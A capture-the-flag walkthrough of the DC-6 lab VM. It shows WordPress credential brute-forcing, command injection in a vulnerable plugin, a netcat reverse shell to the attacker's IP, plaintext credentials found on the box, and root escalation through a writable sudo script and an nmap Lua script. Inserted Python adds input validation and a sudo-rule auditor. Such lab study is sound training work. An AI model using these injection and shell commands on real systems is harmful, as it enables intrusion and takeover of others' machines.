DC919 CTF night w/"DC-6"

DC919 CTF exercise night using "DC-6" prebuilt VM image

SPOILER ALERT: This document is intended to be a walk-through, so if you want to do this CTF challenge honestly, close this page now.

Credits

The following is the result of a group effort during a CTF conf call. There were a bunch of people present on the call, and if they ask me to I'll happily list them here. We share lots of tricks during these calls, everyone contributes and we all come out smarter.

Setup

In this case the VMs have the following IPs:

  Target (DC-6, hostname 'wordy'): 192.168.57.3
  Attacker (Kali VM): 192.168.57.254

Process

Info gathered on 192.168.57.3: nmap finds ports 22 and 80 open, and a browser shows a WordPress site.

'wpscan' shows the site is running the latest WordPress, but with vulnerable plugins.

Used 'wpscan' to brute-force user credentials and enumerate the vulnerable plugins.

Exploit vulnerable plugin

Used the CVE-2018-15877 PoC as an example, together with Firefox's built-in developer tools and 'Edit and Resend' from the Network tab, to confirm the vulnerability, run commands and get a reverse shell:

With Firefox open, log in to the WordPress site with the newly found credentials, then manually edit the URL to reach the vulnerable page: http://wordy/wp-admin/admin.php?page=plainviewactivitymonitor&tab=activity_tools

This should show a text box and the relevant form submit button, "Lookup". The vulnerability is a lack of input validation/sanitization: whatever we put in this text box is passed directly to a command-line utility on the system ('dig'). However, we can't just put anything we want in the text box, because there are constraints. The biggest are that the text box limits the length of the input, and the exploit requires a hostname that resolves: if you supply a bad parameter, the underlying utility exits with an error code and your commands won't run.

The easiest proof of concept for this exploit that I found is to type this into the text box and hit the Lookup button:

b.ca|id

If all is well, you should see the output of the id command, indicating that the commands run as the www-data user.
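For the defender's side of this bug, here is an added example (not the plugin's code and not from the original page) in Python of what the lookup handler should have done: check that the submitted value is a syntactically valid hostname and hand it to dig as a separate argv element instead of through a shell. The handler name and the detection helper are hypothetical; the vulnerable concatenation pattern is described in a comment, not executed.

```python
import re
import subprocess

# Shell metacharacters that have no place in a hostname; a request body hitting
# the lookup form with any of these is worth an alert (the PoC above uses '|').
SHELL_META = re.compile(r"[|;&`$<>(){}\n\\]")

# One RFC 1123 label: letters, digits and hyphens, not starting or ending
# with a hyphen, at most 63 characters.
LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_hostname(value):
    """True if value is a syntactically valid dot-separated hostname."""
    if not value or len(value) > 253:
        return False
    labels = value.rstrip(".").split(".")
    return all(LABEL_RE.match(label) for label in labels)


def flags_injection(value):
    """Detection side: does the submitted value carry shell metacharacters?"""
    return SHELL_META.search(value) is not None


def build_lookup_argv(user_input):
    """Return the argv list for the lookup, or raise ValueError.

    The vulnerable pattern builds a command string such as 'dig ' + user_input
    and hands it to a shell, which is why 'b.ca|id' runs id. Here the value
    must pass the hostname check and becomes one argv element, so no shell
    ever interprets it.
    """
    host = user_input.strip()
    if not is_valid_hostname(host):
        raise ValueError("rejected lookup value: %r" % user_input)
    return ["dig", host]


def run_lookup(user_input):
    """Hypothetical handler body: validate, then run dig without a shell."""
    argv = build_lookup_argv(user_input)
    done = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return done.stdout
```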

To get any farther, we'll have to use a more advanced method. Specialized tools like Burp Suite will make quick work of the next steps if you know how to use them, but Firefox has built-in developer tools that will do the job, and that's what is used here:

With the vulnerable target page open in Firefox, open the Developer Tools (hit F12) and head to the Network tab.

Run the same b.ca|id Lookup with the Network tab open and you'll see a POST request show up at the top of the list. Select it and explore the contents of the tabs on the right.

When done exploring, right-click the POST request in the left pane again and click Edit and Resend. You'll get some text boxes on the right; find the Request Body, change id to cat /etc/passwd, then click Send.

This probably won't change the original page view in the browser, but if you click on the new POST request and head to the Response tab, you should see both a rendered version including /etc/passwd and the raw payload at the bottom. If this worked, it's time to move on to getting a reverse shell.

Get a reverse shell

To get a reverse shell, we'll use some tricks like the ones found here: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet.

First, on our Kali VM, run this in a new terminal:

nc -v -l -p 8080

Using our Edit and Resend method in Firefox from above, send the following to the vulnerable target form (192.168.57.254 is our Kali VM IP):

b.ca|nc -e /bin/sh 192.168.57.254 8080

If that worked, you should see in your Kali VM terminal something like this:

systat@kali:~$ nc -v -l -p 8080
listening on [any] 8080 ...
connect to [192.168.57.254] from wordy [192.168.57.3] 34348

Try running a command or two, but be careful what you send: this is a fragile shell with no prompt, no terminal handling, etc.:

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uptime
 17:36:04 up  1:17,  1 user,  load average: 0.00, 0.00, 0.15

Once a reverse shell is obtained, redirect stderr to stdout so that error output also comes back over the shell, which makes recon easier:

exec 2>&1

Filesystem recon

Filesystem recon showed database credentials in /var/www/html/wp-config.php: wpdbuser/meErKatZ (wordpressdb)

Filesystem recon showed a writable script at /home/jens/backups.sh

Filesystem recon showed plaintext credentials for 'graham' user in /home/mark/stuff/things-to-do.txt: graham / GSo7isUM1D4

With the 'graham' user credentials found, we can progress from our hacky reverse shell to a proper ssh session, so do that and move on.

Further exploration

As 'graham', we should check what we're able to do with sudo:

  graham@dc-6:/home/jens$ sudo -l
  Matching Defaults entries for graham on dc-6:
      env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
  
  User graham may run the following commands on dc-6:
      (jens) NOPASSWD: /home/jens/backups.sh

Using this (and the fact that backups.sh is writable by graham), replace the contents of backups.sh with 'sudo -l >/tmp/f.txt' and run 'sudo -u jens /home/jens/backups.sh', which leaves this gem in /tmp/f.txt:

  Matching Defaults entries for jens on dc-6:
      env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
  
  User jens may run the following commands on dc-6:
      (root) NOPASSWD: /usr/bin/nmap

Privilege escalation (sudo-as-root access)

Modify backups.sh again, replacing its contents with this:

  #!/bin/sh
  exec /bin/sh

Running 'sudo -u jens /home/jens/backups.sh' as before gets a shell as 'jens', a user who, as we now know, can run nmap as root with no password.

Privilege escalation (to root)

Armed with prior knowledge that nmap will run Lua (NSE) scripts, we ran this:

$ echo "os.execute('/bin/sh')" >shell.nse && sudo nmap --script=./shell.nse

Starting Nmap 7.40 ( https://nmap.org ) at 2019-06-15 14:08 AEST
# id
uid=0(root) gid=0(root) groups=0(root)

Bonus: run "stty sane" to fix the local echo in the root shell.
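The two sudo rules above form a chain: a NOPASSWD target that its caller can rewrite (the writable backups.sh), then a NOPASSWD target that can run arbitrary code (nmap via --script). As an added example that is not from the original page, the Python below audits 'sudo -l' output for exactly those two conditions; the list of code-running binaries, the sample rules and the temporary script it builds are all constructed here.

```python
import os
import re
import stat
import tempfile

# Binaries that run arbitrary code when allowed under sudo; nmap qualifies
# because --script executes a Lua file of the caller's choosing, as shown above.
SHELL_CAPABLE = {"nmap", "vim", "vi", "less", "find", "awk", "perl", "python3", "sh", "bash"}
# Matches a 'sudo -l' command line such as '(jens) NOPASSWD: /home/jens/backups.sh'.
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)")

def parse_rule(line):
    """Return {'runas', 'nopasswd', 'cmd'} for a command line, else None."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    return {"runas": m.group("runas"), "nopasswd": "NOPASSWD:" in m.group("tags"),
            "cmd": m.group("cmd")}

def audit_rule(rule):
    """List the problems with one parsed sudo rule (empty list means clean)."""
    findings = []
    if os.path.basename(rule["cmd"]) in SHELL_CAPABLE:
        findings.append("target can run arbitrary code")
    try:
        st = os.stat(rule["cmd"])
    except FileNotFoundError:
        return findings + ["target does not exist"]
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("target is group- or world-writable")
    if st.st_uid != 0:
        findings.append("target is not owned by root")
    return findings

def audit_sudo_l(text):
    """Map each command path in 'sudo -l' output to its findings."""
    report = {}
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is not None:
            report[rule["cmd"]] = audit_rule(rule)
    return report

def demo_writable_script():
    """Constructed scenario: a world-writable backup script granted via NOPASSWD."""
    path = os.path.join(tempfile.mkdtemp(), "backups.sh")
    with open(path, "w") as f:
        f.write("#!/bin/sh\ntar czf /tmp/backup.tgz /var/www\n")
    os.chmod(path, 0o777)
    return audit_sudo_l("(jens) NOPASSWD: %s\n(root) NOPASSWD: /usr/bin/nmap\n" % path)
```

Feeding real 'sudo -l' output to audit_sudo_l flags both rules from this box; the Defaults and "User ... may run" lines are skipped because they never match RULE_RE.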

# cat /root/theflag.txt


Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

mtime: 2019-06-14

© 2019 systat | Powered by OpenBSD | Built with ssg3